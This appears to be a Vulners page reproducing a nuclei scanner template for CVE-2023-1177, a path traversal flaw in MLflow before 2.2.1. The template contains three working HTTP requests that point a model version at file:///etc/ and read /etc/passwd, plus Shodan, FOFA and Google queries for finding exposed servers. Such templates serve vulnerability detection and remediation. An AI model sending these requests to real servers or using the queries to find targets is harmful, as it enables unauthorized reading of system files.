Lucene search
K

Mlflow <2.2.1 - Local File Inclusion

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 52 Views

Mlflow <2.2.1 - Local File Inclusion vulnerability allows unauthorized administrative operations, data modification, and sensitive information access

Related
Refs
Code
id: CVE-2023-1177

info:
  name: Mlflow <2.2.1 - Local File Inclusion
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Mlflow before 2.2.1 is susceptible to local file inclusion due to path traversal \..\filename in GitHub repository mlflow/mlflow. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
  impact: |
    Successful exploitation could allow an attacker to read sensitive files on the server.
  remediation: |
    Upgrade Mlflow to version 2.2.1 or later to mitigate the vulnerability.
  reference:
    - https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28/
    - https://github.com/mlflow/mlflow/commit/7162a50c654792c21f3e4a160eb1a0e6a34f6e6e
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1177
    - https://huntr.dev/bounties/1fe8f21a-c438-4cba-9add-e8a5dab94e28
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1177
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-1177
    cwe-id: CWE-29,CWE-22
    epss-score: 0.69468
    epss-percentile: 0.99277
    cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: lfprojects
    product: mlflow
    shodan-query: http.title:"mlflow"
    fofa-query:
      - title="mlflow"
      - app="mlflow"
    google-query: intitle:"mlflow"
  tags: cve2023,cve,mlflow,oss,lfi,huntr,intrusive,lfprojects,vkev,vuln

http:
  - raw:
      - |
        POST /ajax-api/2.0/mlflow/registered-models/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8

        {"name":"{{randstr}}"}
      - |
        POST /ajax-api/2.0/mlflow/model-versions/create HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json; charset=utf-8

        {"name":"{{randstr}}","source":"file:///etc/"}
      - |
        GET /model-versions/get-artifact?path=passwd&name=AJAX-API&version={{version}} HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - '"version": "([0-9.]+)",'
        internal: true
        part: body
# digest: 4a0a00473045022059b0bcf3fe4c75a7333792f9c8900b14e45e239bb44515b389143fb3eb34ed100221009f6108a44c4377299e2770ad63d0ce4170ecf6aa896428e84ab038c31ef9959f:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.2High risk
Vulners AI Score7.2
CVSS 3.19.3 - 9.8
EPSS0.69468
SSVC
52